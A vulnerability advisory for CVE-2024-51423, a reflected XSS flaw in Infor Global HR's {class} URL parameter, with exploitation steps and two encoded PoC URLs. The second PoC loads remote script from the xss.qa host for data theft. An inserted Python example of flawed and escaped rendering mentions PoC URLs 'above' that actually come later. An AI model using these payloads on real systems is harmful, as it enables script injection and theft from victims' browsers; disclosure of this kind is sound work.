❗Reflected XSS

Infor Global HR v11.23.03.00.21 and prior is affected by Reflected XSS (AKA Non-Persistent or Type I) vulnerability.

Reflected XSS (authenticated)

CVE-2024-51423

Infor Global HR v11.23.03.00.21 and prior is affected by a Reflected XSS (AKA Non-Persistent or Type I) vulnerability via the {class} parameter in Error Message Rendering. Authentication is required.

Description

A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in Infor Global HR v11.23.03.00.21 and prior versions. This vulnerability resides in the URL endpoint responsible for handling class lists. It occurs due to inadequate sanitization and improper handling of user-supplied input in the {class} parameter of the URL, which is reflected in server-generated error messages.

When an undefined or invalid {class} value is passed through the URL, the system attempts to load a non-existent class. As a result, the server generates an error message that includes the provided input without adequate sanitization or output encoding. Consequently, attackers can inject arbitrary HTML or JavaScript into this parameter; when it is reflected into the error message, it executes in the context of the user's browser, resulting in a cross-site scripting (XSS) vulnerability.
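To make the root cause and the fix concrete, here is an added example (not Infor's code): it extracts the {class} segment from a URL shaped like the PoC URLs above, renders the error message the flawed way (raw interpolation) and the hardened way (HTML-encoded), and checks whether a value containing markup characters survived into the response verbatim. The path pattern, class registry and function names are assumptions for illustration.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Path shape inferred from the advisory's PoC URLs; the capture is the {class} segment.
# Matching is done on the still-encoded path, so an encoded "/" inside the segment
# cannot split it.
CLASS_PATH_RE = re.compile(r"^/[^/]+/soap/classes/(?P<cls>[^/]+)/lists/")

# Constructed stand-in for the application's registry of loadable classes.
KNOWN_CLASSES = {"Employee", "Position"}


def extract_class_param(url: str) -> str:
    """Return the URL-decoded {class} path segment, as a server framework would."""
    m = CLASS_PATH_RE.match(urlsplit(url).path)
    if m is None:
        raise ValueError("not a /soap/classes/{class}/lists/ URL")
    return unquote(m.group("cls"))


def render_error_vulnerable(cls: str) -> str:
    """Mirrors the flaw described above: the raw value is interpolated into HTML."""
    if cls in KNOWN_CLASSES:
        return ""  # class exists, no error page
    return f"<p>Error: class {cls} could not be loaded.</p>"


def render_error_fixed(cls: str) -> str:
    """Hypothetical fix: HTML-encode the reflected value before it reaches the page."""
    if cls in KNOWN_CLASSES:
        return ""
    return f"<p>Error: class {html.escape(cls, quote=True)} could not be loaded.</p>"


def reflected_unencoded(rendered: str, cls: str) -> bool:
    """True when a value containing HTML-significant characters appears verbatim."""
    return html.escape(cls, quote=True) != cls and cls in rendered


if __name__ == "__main__":
    # The advisory's first PoC URL, used here as test input.
    poc = ("https://example.com/lmhcm_in4prd1/soap/classes/"
           "%3cimg%20src%3da%20onerror%3dalert(1)%3e/lists/_generic")
    cls = extract_class_param(poc)
    print("vulnerable reflects markup:", reflected_unencoded(render_error_vulnerable(cls), cls))
    print("fixed reflects markup:     ", reflected_unencoded(render_error_fixed(cls), cls))
```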
Exploitation

  • Modify the {class} parameter in the URL to include a malicious payload, such as JavaScript or HTML code.

  • Send the crafted URL to a victim via phishing, social engineering, or any other attack vector.

  • When the victim navigates to the modified URL, the application reflects the malicious input directly into the error message without sufficient sanitization.

  • The victim’s browser renders the injected payload in the error message, allowing arbitrary script execution within the victim's browser.

Example 1 - Simple JavaScript Alert Injection

URL Encoded Payload


https://example.com/lmhcm_in4prd1/soap/classes/%3cimg%20src%3da%20onerror%3dalert(1)%3e/lists/_generic

PoC (executed payload)

Example 2 - Remote JavaScript Injection for Data Theft

URL Encoded Payload

https://example.com/lmhcm_in4prd1/soap/classes/%3Cimg%20src=x%20onerror=%28function%28%29%7Bs%3Ddocument%2EcreateElement%28%27script%27%29%3Bs%2Esrc%3D%27%2F%2Fxss%2Eqa%27%3Bdocument%2Ebody%2EappendChild%28s%29%7D%29%28%29%3B%3E/lists/_generic

PoC (executed payload)
